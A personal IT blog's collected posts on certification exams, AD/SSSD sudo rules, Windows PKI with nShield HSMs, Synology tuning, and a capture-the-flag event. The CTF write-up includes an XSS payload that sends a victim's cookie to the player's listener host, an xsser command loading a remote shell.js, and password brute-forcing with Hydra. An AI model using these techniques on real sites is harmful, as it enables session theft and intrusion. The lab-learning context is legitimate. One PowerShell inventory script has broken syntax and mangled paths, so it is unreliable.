
EX413 prep: my cheat sheet


I used Sander van Vugt's EX413/LPI3 video training to prep for my EX413 exam and expanded upon all that information by performing additional research. All in all, I've spent roughly sixty hours over the past five weeks to get up to speed. Over the course of the training I compiled over fifty pages of notes. :)


I've extracted all the really important information from my notes to make this seven-page EX413 cheat sheet. I hope other students find it useful.


Of course, this is NO SUBSTITUTE for doing your own studying and research. Be sure to put in your time, experimenting with all the software you'll need to know. The summary is based on my own knowledge and experience, so I'm sure I've left out lots of things that other people might need to learn.




EX413: it's been one heck of a ride!


2017-11-02: Updates can be found at the bottom.


Five weeks ago, I started a big challenge: pass the RedHat EX413 "Certificate of Expertise" exam in Linux server hardening. I've spent roughly sixty hours studying and seven more on the exam, but I've made it! As this post's title suggests, it's been one heck of a ride!


Unfortunately, that's not just because of the hard work. 


I prepared for the exam by following Sander van Vugt's Linux Security Hardening video training on Safari Books Online. Sander's course focuses on both EX413 and LPI-3 303, so there was quite a bit of material which did not apply to my specific exam. No worries, because it's always useful to repeat known information and to learn new things. Alongside Sander's course I spent a lot of time experimenting in my VM test lab and doing more research with Internet resources. Unfortunately I found Sander's course to be lacking content for one or two key areas of EX413. We have discussed the issues I had with his training and he's assured me that my feedback will find its way into a future update. Good to know.


Taking the exam was similar to my previous RedHat Kiosk experiences. Back in 2013 I was one of the first hundred people to take a Kiosk exam in the Netherlands (still have the keychain lying around somewhere) and the overall experience is still the same. One change: instead of the workstation with cameras mounted everywhere, I had to work with a Lenovo laptop (good screen, but tiny fonts). The proctor via live chat was polite and responded quickly to my questions.


Now... I said I spent seven hours on the exam: I took it twice. 


Friday 27/10 I needed the full four hours and had not fully finished by the time my clock reached 00:00. This was due to two issues: first, Sander's course had missed one topic completely and second, I had a suspicion that one particular task was literally impossible. Leaving for home, I had a feeling that it could be a narrow "pass". A few hours later I received the verdict: 168/300 points, with 210 being the passing grade. A fail.


I was SO angry! With myself of course, because I felt that I'd messed up something horribly! I knew I hadn't done well, but I didn't expect a 56% score. I put all that anger to good use and booked a retake of the exam immediately. That weekend I spent twelve hours boning up on my problem areas and reviewing the rest.


Come Monday, I arrived at the now familiar laptop first thing in the morning. BAM! BAM! BAM! Most of the tasks I was given were hammered out in quick succession, with a few taking some time because of lengthy command runtimes. In the end I had only one task left: the one which I suspected to be impossible. 


I spoke to the proctor twice about this issue. The first time (1.5 hours into the test) I provided full details of the issue and my explanation for why the task was impossible. The proctor took it up with RedHat support and half an hour later the reply was "this is as intended and is a problem for you to solve". Now, I cannot provide you with details about the task, so I'll give you an analogy instead. Task: "Here's a filled-out and signed form. And over here you will find the personnel files for a few employees. Using the signature on the form, ascertain which employee signed the form. Then use his/her personal details to set up a new file." However, when inspecting the form, you find the signature box to be empty. Blank. There is no signature.


After finishing all other work I spoke to the proctor again, to reiterate my wish for RedHat to step in. The reply was the same: it works as intended and complaints may be sent to certification-team@. Fine. Since I'd finished all other tasks (and rebooted at least six times along the way to ensure all my work was sound), I finished the exam assuming I'd get a passing score anyway. I felt good! I'd had a good day, banged out the exam in respectable time and I had improved upon my previous results a lot!


I took their suggestion and emailed the Cert Team about the impossible question. Both to help them improve their exams and to get a few extra points on my final score.


A few hours later I was livid.


The results were in: 190/300 points: 63%, where 70% is needed for a pass. All my improved work, with only one unfinished task, had apparently only led to a 22-point increase?! And somewhere along the way RedHat says I just left >30% of my points lying around?! No fscking way.


I sent a follow-up to my first email, politely asking RedHat to consider the impossible assignment, but also to give my exam results a review. I sincerely suspect problems with the automated scoring on my test, because for the life of me I cannot imagine where I went so horribly wrong to miss out on 30% of the full score!


This morning, twenty-four hours after my last email to the Cert Team, I got a new email from the RH Exam Results system. My -first- exam was given a passing score of 210/300. No further feedback at all, just the passing score on the first sitting.


While I'm very happy to have gotten the EX413, this of course leaves me with some unresolved questions. All three have been fired in RedHat's direction; I hope to have some answers by the end of the week. 



  • Getting the literal passing score of 210/300 feels odd. As if someone thought "let's get him off our backs and simply tick the PASS box". I sincerely hope that's not the case. I expect better of RedHat.

  • Was I right in saying the assignment was flawed? Was I right in suspecting issues with the auto-grading?

  • Since I apparently did not fail the first sitting, I would like a refund on the second test or a voucher for another exam. These things ain't cheap! 


 


In closing I'd like to say that, despite my bad experiences, I still value RedHat for what they do. They provide solid products (RHEL, IDM/IPA and their many other tools) and their practical exams are important to a field of work rife with simple multiple-choice questions. This is exactly why my less-than-optimal experience saddens me: it mars the great things RedHat does!


 


Update 2017-11-02:


This morning I received an email from the Certification Team at RedHat, informing me that my report of the bugged assignment was warranted. They had made an update to the exam which apparently had not been fully tested, allowing the problem I ran into to make it into the production exams. RedHat will be A) updating the exam to resolve the issue and B) reissuing scores for other affected candidates.



PasswordState, Active Directory and Sudo: oh my!


Recently I've gone over a number of options for connecting a Linux environment to an existing Active Directory domain. I won't go into the customer's specifics, but after considering Winbind, SSSD, old school LDAP and commercial offerings like PBIS we went with the modern-yet-free SSSD-based solution. The upside of this approach is that integration is quick and easy. Not much manual labor needed at all.


What's even cooler, is that SSSD supports sudoers rulesets by default!


With a few tiny adjustments to your configuration and after loading the relevant schema into AD, you're set to go! Jakub Hrozek wrote instructions a while back; they couldn't be simpler!


So now we have AD-based user logins and Sudo rules! That's pretty neat, because not only is our user management centralized, so is the full administration of Sudo! No need to manage /etc/sudoers and /etc/sudoers.d on all your boxen! Config management tools like Puppet or Ansible might make that easier, but one central repo is even nicer! :D
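For reference, the relevant sssd.conf bits come down to something like this minimal sketch, assuming an AD provider and an illustrative domain name and search base (see Jakub's post for the real deal):

[sssd]
services = nss, pam, sudo
domains = corp.example.com

[domain/corp.example.com]
id_provider = ad
access_provider = ad
sudo_provider = ad
ldap_sudo_search_base = OU=sudoers,DC=corp,DC=example,DC=com

Plus a "sudoers: files sss" line in /etc/nsswitch.conf, so that sudo actually asks SSSD.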


 




 


Now, I've been working with the PasswordState password management platform for a few weeks and so far I love it. Before getting the logins+Sudo centralized, getting the right privileged accounts on the Linux boxen was a bit of a headache. Well, not anymore! What's even cooler, is that using Sudo+LDAP improves upon a design limitation of PasswordState!


Due to the way their plugins are built, Click Studios say you need -two- privileged accounts to manage Linux passwords (source, chapter 14). One that has Defaults:privuser rootpw in sudoers and one that doesn't. All because of how the root password gets validated with the heartbeat script. With Sudoers residing in LDAP this problem goes away! I quote (from the sudoers.ldap man-page):



It is possible to specify per-entry options that override the global default options. /etc/sudoers only supports default options and limited options associated with user/host/commands/aliases. The syntax is complicated and can be difficult for users to understand. Placing the options directly in the entry is more natural.



Would you look at that! :) That means that, per the current build of PasswordState, the privileged user for Linux account management needs the following three sudoers entries in AD / LDAP. 



CN=pstate-ECHO,OU=sudoers,DC=domain,DC=local:
sudoHost = ALL
sudoCommand = /usr/bin/echo
sudoOption = rootpw
sudoUser = pstate


CN=pstate-PASSWDROOT,OU=sudoers,DC=domain,DC=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd root
sudoOption = rootpw
sudoOrder = 10
sudoUser = pstate


CN=pstate-PASSWD,OU=sudoers,DC=domain,DC=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd *
sudoUser = pstate



The "sudo echo" is used to validate the root password (because the rootpw option is applied). I only applied the rootpw option to "sudo passwd root" to maintain compatibility with the default script included with PasswordState



Back in the saddle: CompTIA PenTest+


It's been a few months since I last took a certification exam: I closed last year with a speed-run of RedHat's EX413, which was a thrill. Since then, I've taken some time off: got into Civ6, read a few books, caught up on a few shows. But as some of my friends will know, it's never too long before I start feeling that itch again... Time to study!


A few weeks back I learned of the new CompTIA PenTest+ certification. They advertised their new cert with a trial run for the first 400 takers. A beta-test of an exam for $50?! I'm game! Sounds like a lot of fun!


Judging by the reactions on TechExams and Reddit, the test is hard to pin down. CompTIA themselves boast "a need for practical experience", while also providing a VERY extensive list of objectives. Seriously, the list is huge. Reports from test-takers are also all over the place: easy drag-and-drop "simulations", large swathes of multiple-choice questions, a very large focus on four of the big names in scripting, "more challenging than I had expected", or "what CEH should have been".


As for me, my test is booked for 16/04. I don't fully know what to expect, but I intend to have fun! In the meantime I'm using the large list of objectives to simply learn more about the world of pentesting. My OSCP certification suggests that I at least understand the basics, but mostly it's shown me how much I don't know :)



Cincero CTF036 - 2018 edition

The battlegrounds

Image credits go to Cincero, who took photos all day.


Another year, another CTF036! No longer under the Ultimum flag, but this time organised by Cincero / Secured by Design. Same awesome people, different company name. The 2016 and 2017 editions were awesome and this year's party lived up to its fame.


As is tradition, the AM was filled with presentations. I was invited to talk as well, but I didn't have anything presentable ready to go; maybe next year! It was a busy day, and Wesley kicked off with DearBytes' findings about the security of home automation systems. Good talk, which had my colleague Dirk's attention because his home is pretty heavily filled with that stuff ;)


Dick and I would be teaming up under the Unixerius flag. Lunch was sorted pretty quickly, so we set up our systems around 12:30. Between the two of us we had three laptops, with my burner laptop serving as Google-machine through my mobile data connection (the in-house Internet connection wasn't very fast). The scenario was consistent with previous years: a description of the target, an explanation of why we were hacking their servers and a few leads to get us started. To sum it up:



  • An employee of an Internet payment provider (pay-deal.nl) has gambling debts and needs to pay them off. He's struck a deal where the debts can be paid in credit card numbers, as opposed to actual money. We've been hired to grab as many credit card numbers as possible.

  • There's a web server, www.pay-deal.nl, and a webmail box, webmail.pay-deal.nl. Supposedly there are at least two workstations.


First order of business: slurp down anything the DNS would give us (a successful zone transfer showed just the four systems, spread across two ranges) and run some port scans against the front two boxen. Results?



  • The web server runs SMB shares which are accessible, as is the RDP server. Yikes, that's bad. The host appears to run Windows Server 2008, with XAMPP.

  • The web site contains a direct-to-email contact form and a login page for a dashboard.

  • The mail box runs Squirrelmail, Postfix and a few other mail-related services. My Nmap scan was too limited, so it missed a "hidden" webapp running on port 1337 :D At the end, Michael explained that this would have been a great spot to try a buffer overflow :)

  • Just like last year, enum4linux failed me completely. It suggested that SMB was working, but that there was no anonymous access. It was only when Michael suggested that "I wouldn't trust that output, why don't you have another look?" that I tried smbclient, which was a lot more successful. The share contained seven cards: 70 points.
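For reference, those opening moves boil down to something like the sketch below (flags from memory; the full -p- scan is exactly the one I skipped, which is how that port 1337 webapp slipped by):

dig axfr pay-deal.nl @ns1.pay-deal.nl    # zone transfer; nameserver name is illustrative
nmap -sV -sC -p- www.pay-deal.nl webmail.pay-deal.nl    # full-range service/version scan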


While perusing the website, we found a number of valid email addresses for employees to try on Squirrelmail. After going over my old OSCP notes, Dick put together a userlist and got to work with Hydra in hopes of brute-forcing passwords for their accounts. This is where the basic Kali stuff isn't sufficient: there are no wordlists for Dutch targets :) While rockyou.txt is awesome, it won't contain famous passwords such as Welkom01, Maandag2018, Andijvie18 and so on. It's time to start putting together a set of rules and wordlists for Dutch targets! In the end we got into two mailboxes, which got us another seven cards: 140 points. 
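Such a Hydra run would look roughly like this (a sketch: the form fields match a stock Squirrelmail login, the wordlist name is made up, and "incorrect" matches Squirrelmail's "Unknown user or password incorrect." failure message):

hydra -L users.txt -P dutch-passwords.txt webmail.pay-deal.nl http-post-form "/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect"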


Unfortunately we didn't get any points beyond that, despite trying a lot of avenues!


Open SMB shares: Dick suspected there was more to the open SMB shares, so he focused on those. Turning to Metasploit and others, he hoped to perform an SMB relay attack using the MSF tooling. Michael later confided that EternalBlue would not work (due to patching), but that the SMB relay was in fact the way to go. Unfortunately Dick couldn't get this one to work; more troubleshooting needed.


Squirrelmail REXEC: Dick noticed that the Squirrelmail version was susceptible to a remote command execution vulnerability. Unfortunately, after quite a bit of trying he concluded that this particular install had been patched. Darn!


Mailing a script: In his own presentation Michael had stressed the importance of simulating human interaction in a CTF, be it through automation or by using a trainee ;) After the rather ham-fisted hints in the Squirrelmail boxes we'd opened, Dick decided to look for a Powershell reverse-shell script and to mail it to the guy waiting for "a script to run". With less than a minute to go before the final bell of the CTF, he got a reverse session! It didn't count for points, but that was a nice find on his part.


SQLi in the site: I ran the excellent SQLMap against all forms and variables that I could find in the site. No inroads found. 


XSS in the site: Michael pointed out that one variable on the site should catch my eye, so I went over it all again. Turns out that hoedan.php?topic= is susceptible to cross-site scripting. This is where I needed to start learning, because I'm still an utter newb at this subject. I expected some analogue of SQLMap to exist for XSS and I wasn't wrong! XSSER is a great tool that automates hunting for XSS vulnerabilities! Case in point:


xsser -u "http://www.pay-deal.nl" -g "/hoedan.php?topic=XSS" --auto --Fr "https://172.18.9.8/shell.js"
...
===========================================
[*] Final Results:
===========================================
- Injections: 558
- Failed: 528
- Sucessfull: 30
- Accur: 5 %


Here's a great presentation by the author of XSSER: XSS for fun and profit.


This could be useful! Which is why I tried a few avenues. Using XSSER, Metasploit and some manual work I determined that the XSS wouldn't allow me to run SQL commands, nor include any PHP. Javascript was the thing that was going to fly. Fair enough. 


Now, that website contained a contact form which can be used to submit your own website for inclusion in the payment network. Sounds like a great way to get a "human" to visit your site. 


Browser_autopwn: At first, I used SEToolkit and MSF to run attacks like browser_autopwn2, inserting my own workstation's webserver and the relevant URL into the contact form. I certainly got visits and after some tweaking determined that the user came from one of the workstations and was running Firefox 51. Unfortunately, after trying many different payloads, none of them worked. So no go on pwning the browser on the workstation.


Grabbing dashboard cookies: Another great article I found helped me get on the way with this one: From reflected XSS to shell. My intention was to have the pay-deal administrator visit their own site (with XSS vuln), so I could grab their cookie in hopes of it having authentication information in there. Basically, like this:


http://www.pay-deal.nl/hoedan.php?topic=Registreren"><script>document.location="http://172.18.9.8/"+document.cookie</script>
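On the receiving end the listener was nothing fancier than a raw Netcat (port assumed from the plain-HTTP callback):

nc -nlvp 80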


While the attack worked and I did get a cookie barfed onto my Netcat listener, it did not contain any authenticating information for the site:


===========================================
connect to [172.18.9.8] from (UNKNOWN) [172.18.8.10] 55469
GET / HTTP/1.1
Host: 172.18.9.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
=========================================== 


Turns out I probably did something wrong, because according to Michael's post-CTF talk this was indeed the inroad to be taken: grab the admin's cookie, login to the dashboard, grab more credit cards and abuse the file upload tool for more LFI fun! Similarly, Dick's attempts at the SMB relay should have also given him inroads to attack the box. We were well on our way, after a bunch of hints. So, we're still pretty big newbs :D


It was an awesome day! I wish I had more spare time, so I could continue the PWK/OSCP online labs and so I could play around with HackTheBox and VulnHub.


EDIT: Here's a great SANS article explaining SMB relay in detail.



CompTIA PenTest+ experience


I've taken the day off, despite things being quite busy at the office, to have a little fun. Specifically, I've just arrived back home after sitting the CompTIA PenTest+ Beta exam. Taking an exam for fun? Absolutely :)


It's no surprise that I first heard about the newly developed exam on Reddit, with the CompTIA team calling for 400 people to take the beta-version of the exam. We're not getting any scores yet, as they'll first tally all the outcomes to determine weaknesses and flaws in questions that may affect scoring negatively. But once the process has completed, if (and that's an IF) you passed, you'll gain full accreditation for the cert. All that and a fun day, for just $50? Sign me up :)


Being a non-native English speaker I was given an extension, tackling 110 questions in 220 minutes (instead of 165). That was certainly doable: I got up from my seat with two hours gone. Overall I can say that my impression of the exam is favorable! While one or two specific topics may have stolen the limelight, I can say that my exam covered a diverse array of subjects. The "simulation" questions, as they call them, were, ehh, okay. They're not what I would call actual simulations, they're more like interactive screens, but I do feel they added something to the experience.


Yeah! Not bad at all! I would heartily endorse this certification track instead of EC Council's CEH. The latter may have better brand-recognition in EMEA, but CompTIA is still known as a respectable organization. 


So, did I pass? I don't know :) As I said, the subject matter turned out to be very diverse, in a very good way. Thus it also covered things I have zero to very little experience with, while an experienced pen-tester would definitely know. And that's the point: despite passing the OSCP exam last year, I -am- still a newbie pen-tester. So if I fail this exam, then I'll feel that it's a justified failure. 



Microsoft OCSP Responders, nShield HSMs and vagaries


Over the past few months I've built a few PKI environments, all based on Microsoft's ADCS. One of the services I've rolled out is the Microsoft OCSP Responder Array: a group of servers working together to provide OCSP responses across your network. 


I've run into some weirdness with the OCSP Responders when working with the Thales / nCipher nShield HSMs. For example, the array would consist of a handful of slaves and one master server. Everything would be running just fine for a week or so, until it was time to refresh the OCSP signing certificates. Then, one node in the array starts misbehaving! All the other nodes are fine, but one of 'em just stops serving responses.


The Windows Event Log contains error codes involving "CRYPT_E_NO_PROVIDER", "NCCNG_NCryptCreatePersistedKey existing lock file" and "The Online Responder Service could not locate a signing certificate for configuration XXXX. (Cannot find the original signer)". Now that second one is a big hint!


I haven't found out why yet, but the problem lies in lock files in the HSM's security world. If you check %NFAST_KMDATA%\local you'll find a file with "lock" at the end of its name. Normally when requesting a keypair from the HSM, a temporary lock is created which gets removed once the keypair is provided. But for some reason the transaction doesn't finish and the lock file stays in place.


For now, the temporary solution is to:



  1. Stop the Online Responder Service.

  2. Remove the lock file from %NFAST_KMDATA%\local.

  3. Restart the Online Responder Service.
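If it keeps recurring, the workaround is easily scripted. A minimal PowerShell sketch, assuming the stale file matches a *lock* pattern (verify the actual filename before deleting anything):

# Stop the Online Responder, clear the stale nShield lock file, start it again.
Stop-Service -Name OCSPSvc
Get-ChildItem "$env:NFAST_KMDATA\local" -Filter "*lock*" | Remove-Item -Verbose
Start-Service -Name OCSPSvc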


With that out of the way, here are two other random tidbits :)


In some cases the service may throw out errors like "Online Responder failed to create an enrollment request" in close proximity to "This operation requires an interactive window station". This happens when you did not set up the keys to be module-protected. The service is asking your HSM for its keys and the HSM is in turn asking you to provide a quorum of OCS (operator cards). If you want the Windows services to auto-start at boot time, always set their keys up as "module protected". And don't forget to run both capingwizard64.exe and domesticwizard64.exe to set this as the default as well!


Finally, from this awesome presentation which explains common mistakes when building an AD PKI: using certutil -getreg provides boatloads of useful information! For example, in order for OCSP responses to be properly signed after rolling over your keypairs, you'll need to certutil -setreg ca\UseDefinedCACertInRequest 1.


(Seriously, Mark Cooper is a PKI wizard!)



Matching Windows certificates to nShield protected keys (kmdata)


Over the past few weeks I've had a nagging question: Windows certutil / certlm.msc has an overview of the active certificates and key pairs for a computer system, but when your keys are protected by a Thales nShield HSM you can't get to the private keys. Fair enough. But then there's the %NFAST_KMDATA% directory on the nShield RFS server, whose local subdirectory contains all of the private keys that are protected by the HSM. And I do mean all the key materials. And those files are not marked in easy-to-identify ways.


So my question? Which of the files in %NFAST_KMDATA%\local ties to which certificate on which HSM client?


I've finally figured it all out :) Let's go to Powershell!


 



PS C:\Windows\system32> cd cert:\LocalMachine\My


PS Cert:\LocalMachine\My> dir
   Directory: Microsoft.PowerShell.Security\Certificate::LocalMachine\My

Thumbprint                                Subject
----------                                -------
F34F7A37C39255FA7E007AE68C1FE3BD92603A0D  CN=testbox, C=thomas, C=NL
...



 


So! After moving into the "Personal" keystore for the local system you can see all certs by simply running dir. This will show you both the thumbprint and the Subject of the cert in question. Using the Powershell Format-List command will show you the interesting meta-info (the example below has many lines removed).


 



PS Cert:\LocalMachine\My> dir F34F7A37C39255FA7E007AE68C1FE3BD92603A0D | fl *
...
DnsNameList              : {testbox}
...
HasPrivateKey            : True
PrivateKey               :
PublicKey                : System.Security.Cryptography.X509Certificates.PublicKey
SerialNumber             : 6FE2C038ED73E7A0469E5E3641BD3690
Subject                  : CN=testbox, C=thomas, C=NL


 



Cool! Now, the HasPrivateKey and PrivateKey lines are interesting, because the system tells you that it does have access to the relevant private key, but not where this key lives. We can turn to the certutil tool to find the important piece of the puzzle: the key container name.


 



PS Cert:\LocalMachine\My> certutil -store My F34F7A37C39255FA7E007AE68C1FE3BD92603A0D
...
Serial Number: 6fe2c038ed73e7a0469e5e3641bd3690
Subject: CN=testbox, C=thomas, C=NL
 Key Container = ThomasTest
 Provider = nCipher Security World Key Storage Provider
Private key is NOT exportable
... 



Again, the interesting lines are Key Container and Provider. This shows that the private key is accessible through the Key Storage Provider (KSP) "nCipher Security World Key Storage Provider" and that the relevant container is named "ThomasTest". This name is confirmed by the nShield command to list your keys:


 



PS Cert:\LocalMachine\My> cnglist --list-keys
ThomasTest: RSA machine
...



 


Now comes the tricky part: the key management data files (kmdata) don't have a filename tying them to the container names:


 



PS Cert:\LocalMachine\My> cd 'C:\ProgramData\nCipher\Key Management Data\Local'


PS C:\ProgramData\nCipher\Key Management Data\Local> dir
...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     11:46       5336 key_caping_machine--...
-a---         15-5-2018     13:37       5188 key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4...



 


So, let's try an old-fashioned grep shall we? :)


 



PS C:\ProgramData\nCipher\Key Management Data\Local> Select-String thomastest *caping_*
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4:2:   ThomasTest  ?   ∂   Vu ?{?%f?&??)?U;?m???   ??  ??  ??  1???B'?????'@??I?MK?+9$KdMt??})???7?em??pm?? ?



 


This suggests that we could inspect the kmdata files and find out their key container name. 


 



PS C:\ProgramData\nCipher\Key Management Data\Local> kmfile-dump -p key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest
...



SHAZAM! 


Of course we can also inspect all the key management data files in one go:


 



PS C:\> $Files = Get-ChildItem 'C:\ProgramData\nCipher\Key Management Data\Local\key_caping*'

PS C:\> ForEach ($KMData in $Files) {kmfile-dump -p $KMData | Select -First 7}
C:\ProgramData\nCipher\Key Management Data\Local\key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest


 





Inventory of certificates, private keys and nShield HSM kmdata files


Building on my previous Thales nShield HSM blog post, here's a nice improvement.


If you make an array with the (FQDN) hostnames of your HSM clients, you can run the following Powershell script on your RFS box to traverse all HSM systems, so you can cross-reference their certs to the kmdata files in your nShield RFS.



$Hosts="host1","host2","host3"


ForEach ($TargetHost) in $Hosts)


{
               Invoke-Command -ComputerName $TargetHost -ScriptBlock {
                              $Thumbs=Get-ChildItem cert:LocalMachineMy
                             ForEach ($TP in $Thumbs.thumbprint) {
                                             $BLOB=(certutil -store My $TP);
                                             $HOSTNAME=(hostname);
                                             $SUBJ=($BLOB | Select-String "Subject:").ToString().Replace("Subject: ","");
                                             $CONT=($BLOB | Select-String "Key Container =").ToString().Replace("Key Container = ","").Replace(" ","");
                                             Write-Output "$HOSTNAME $TP ""$SUBJ"" ""$CONT""";
                             }
              }


 
$KeyFiles = Get-ChildItem 'C:ProgramData
CipherKey Management DataLocalkey_caping*'
ForEach ($KMData in $KeyFiles) {
               $CONT=(kmfile-dump -p $KMData | Select -First 7 | Select -Last 1)
               Write-Output "$KMData $CONT";
}



 


For example, output for the previous example would be:


TESTBOX F34F7A37C39255FA7E007AE68C1FE3BD92603A0D "CN=testbox, C=thomas, C=NL" "ThomasTest"


C:\ProgramData\nCipher\Key Management Data\Local\key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4                    ThomasTest


 


The first line is for host TESTBOX and shows the testbox certificate, with a link to the ThomasTest container. The second line shows the specific kmdata file that is tied to the ThomasTest container. Nice :)



Handy tool to troubleshoot your Microsoft ADCS PKI

Doesn't look like much, but it's great

It has been little over a year now since I started at $CLIENT. I've learned so many new things in those twelve months, it's almost mindboggling. Here's how I described it to an acquaintance recently:



"To say that I’m one lucky guy would be understating things. Little over a year ago I was interviewed to join a project as their “pki guy”: I had very little experience with certificates, had messed around a bit with nShield HSMs, but my customer was willing to take a chance on me. ... ... A year onwards I’ve put together something that I feel is pretty sturdy. ... We have working DTAP environments, the production environment’s been covered with a decent keygen ceremony and I’m training the support crew for their admin-tasks. There’s still plenty of issues to iron out, like our first root/issuing CA renewal in a few weeks, but I’m feeling pretty good about it all."



As I described to them, I feel that I'm at a 5/10 right now when it comes to PKI experience. I have a good grasp of the basics, I understand some of the intricacies, I've dodged a bunch of pitfalls and I've come to know at least one platform.


How little I know about this specific platform (Microsoft's Active Directory Certificate Services) gets reinforced frequently, for example by stumbling upon Brian Komar's reply to this thread. The screenshot above might not look like much, but it made my day yesterday :) "Pkiview.msc" you say? It builds a tree-view of your PKI's structure on the lefthand side and on the right side it will show you all the relevant data points for each CA in the list. 


This is awesome, because it will show you immediately when one of your important pieces of meta-data goes unavailable. For example, in the PKI I built I have a bunch of clones of the CRL Distribution Point (CDP) spread across the network. Oddly, these clones were lighting up red in the pkiview tool. Turns out that the cloning script had died a while back, without any of us noticing.


So yeah, it may not look like much, but that's one great troubleshooting tool :)



Keywords for this week: Windows, Linux, PKI and DAMTA


It's gonna be a busy week! 


Most importantly, I'll be taking CQure's "DAMTA" training: Defense Against Modern Targeted Attacks. Basically, an introduction to threat hunting and improved Blue Teaming. Sounds like it's going to be a blast and I'm looking forward to it a lot :)


Unfortunately this also means I'll be gone from the office at $CLIENT for three days; that bites, 'cause I'm in the midst of a lot of PKI and security-related activities. To make sure I don't fall behind too much I'm running most of my experiments in the evenings and weekends.


For example, I've spent a few hours this weekend on setting up a Microsoft ADCS NDES server, which integrates with my Active Directory setup and the base ADCS. My Windows domain works swimmingly, but now it's time to integrate Linux. Now I'm looking at tools like SSCEP and CertMonger to get the show on the road. To make things even cooler, I'll also integrate both my Kali and my CentOS servers with AD. 


Busy, busy, busy :)



Synology vagaries: slow transfers, 100% volume util, very high load average, very high IOWAIT


I've been a very happy user of Synology systems for quite a few years now. The past few weeks I've run into quite a few performance issues though, so I decided to get to the bottom of it.


Symptoms:



  • CPU usage is low, with <15% active usage.

  • CPU usage is stuck on 70-85% IOWAIT.

  • My load average is very high, at 14.xx consistently.

  • The performance monitoring tool shows 100% volume utilization.

  • Very low transfer speeds to/from the NAS.

  • Very long connection times on the file shares.

  • Very slow logins and bad response times on SSH and the web interface.
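For the record, those numbers all came from plain SSH tools; nothing Synology-specific is needed to confirm the symptoms (iostat is only there if sysstat happens to be installed on your DSM):

top             # load average and the %wa (IOWAIT) figure live in the header
iostat -x 5     # per-device utilisation, when available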


I have undertaken a few steps that seem to have gotten me in the right direction...



  1. I have gone over the list of active services and disabled the ones I do not use.

  2. I verified the installed packages and I've removed all the things I really don't need.

  3. I have disabled the Universal Search function, which cannot be disabled without trickery (see below).

  4. I have disabled the Indexing daemon in full, which also cannot be disabled without extra effort (also below).


In order to disable Universal Search:



  1. Login through SSH

  2. cd /var/packages/SynoFinder

  3. sudo cp INFO INFO.orig

  4. sudo vi INFO


Make the following changes:



ctl_stop="yes"
ctl_uninstall="yes"



You can now restart Package Center in the GUI, browse to Universal Search / SynoFinder and stop the service. You could even uninstall it if you like.


In order to disable the Indexer daemon:



  1. Login through SSH

  2. sudo synoservice --hard-stop synoindexd

  3. sudo synoservice --disable synoindexd


The second step is needed to also stop and disable the synomkthumb and synomkflvd services, which rely upon synoindexd.


One reboot later and things have quieted down. I'll keep an eye on things the next few days.



CFR-310 beta exam experience


I guess I've found a new hobby: taking beta-versions of cybersec certification exams. :)


Three months ago I took the CompTIA Pentest+ beta and not half an hour ago I finished the CertNexus CFR-310 beta. Like before, I learned about the beta-track through /r/netsecstudents where it was advertised with a discount code bringing the $250 exam down to $40 and ultimately $20. Regardless of whether the certification has any real-world value, that's a nice amount to spend on some fun!


To sum up my experience:



  • The Examity-proctored, take-from-home testing works very well. They don't use nasty installers that run software with admin privs on your system; they simply use GoToMeeting to monitor your mic, cam and screen. Effective and not too intrusive.

  • The questions were a nice mix between technical knowledge (knowing various tools and some basic scripting and flags) and procedural knowledge (policies, standards, regulations, processes). 

  • Overall the required level of expertise seems rather basic and in retrospect it feels like most of the information can/will be spoonfed during the classroom/online course.


Now... Is the CFR-310 certification "worth it"? As I've remarked on Peerlyst earlier this week: it depends.


If you have a specific job requirement to pass this cert, then yes it's obviously worth it. Then again, most likely your employer or company will spring for the exam and it won't be any skin off your back. And if you're a forward thinking contractor looking to get assignments with the DoD, then it could certainly be useful to sit the exam as it's on the DoD 8570 list for two CSSP positions.


If, like me, you're relatively free to spend your training budget and you're looking for something fun to spend a few weeks on, then I'd suggest you move on to CompTIA's offerings. CertNexus / Logical Operations are not names I'd heard before and CompTIA is a household-name in IT; has been for years. 



Passed the PenTest+ beta exam!


A bit over three months ago, I took part in CompTIA's beta version of the PenTest+ exam. It was a fun and learning experience and despite having some experience, I didn't expect to pass. 


Turns out, I did! I passed with an 821 out of 900 score :D 


Now, I hope that some of the feedback I provided has been useful. That's the point of those beta exams, isn't it?



Another quarter, another beta


I took the CompTIA Linux+ beta (XK1-004) today and I wasn't very impressed... It's "ok".


I have no recent experience with LPIC or with the previous version of Linux+; my only LPIC experience is from ten years ago. Based on that, I feel that the new Linux+ is less... exciting? thrilling? than what I'd expect from LPIC. It feels to me like a traditional junior Linux exam with its odd fascination with tar, but with modern subjects (like Git or virtualization) tacked on the side.


Personally I disliked one of the PBQs, with a simulated terminal. This simulation would only accept the exact, literal command and parameter combinations that have been programmed into it. Anything else, any other permutation of flags, results in the same error message. Imagine my frustration when a command that I run almost daily to solve the question at hand is not accepted, because I'm not using the exact flags, or the exact order thereof, that they want me to type.


Anyway. I'm glad that I took the beta, simply to get more feeling of the (international) market place. Now at least I'll know what the cert entails, should I ever see it on an applicant's resumé. :)




Query ADCS (Active Directory Certificate Services) for certificate details


I think Microsoft's ADCS is quite a nice platform to work with, as far as PKI systems go. I've heard people say that it's one of the nicest out there, but given its spartan interface that kind of makes me worry for the competitors! One of the things I've fought with, was querying the database backend, to find certificates matching specific details. It took me a lot of Googling and messing around to come up with the following examples.


 


To get the details of a specific request:



certutil -view -restrict "requestid=381"



 


To show all certificate requests submitted by myself:



